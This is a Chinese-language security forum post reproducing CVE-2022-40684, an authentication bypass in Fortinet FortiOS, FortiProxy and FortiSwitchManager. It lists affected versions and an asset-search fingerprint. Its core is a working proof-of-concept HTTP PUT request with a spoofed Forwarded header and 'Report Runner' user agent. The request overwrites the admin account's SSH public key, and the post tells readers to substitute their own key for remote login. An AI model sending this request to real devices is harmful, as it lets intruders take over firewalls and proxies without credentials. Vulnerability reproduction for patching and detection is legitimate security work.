问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684
# Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684 ## 漏洞描述 Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一...
Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684 ============================================== 漏洞描述 ---- Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例 漏洞影响 ---- FortiOS <= 7.2.1、7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0 FortiProxy <= 7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0 FortiSwitchManager <= 7.2.0、7.0.0 网络测绘 ---- title="FortiProxy" 漏洞复现 ---- 登录页面 ![img](https://shs3.b.qianxin.com/butian_public/f39180998345c2795b63e95951247c53ef9aa56ab6fdd.jpg) 验证POC, 利用时更换 admin用户名及 ssh-public-key1中的 ssh key 添加远程 SSH登录凭证 ```java PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Content-Length: 597 Content-Type: application/json Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888" User-Agent: Report Runner {"ssh-public-key1": "123"} ``` ![img](https://shs3.b.qianxin.com/butian_public/f828637bea6c7e70803865c2ce92f05cdd236b7a2003a.jpg)
发表于 2024-07-12 18:49:23
阅读 ( 1095 )
分类:
网络设备
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!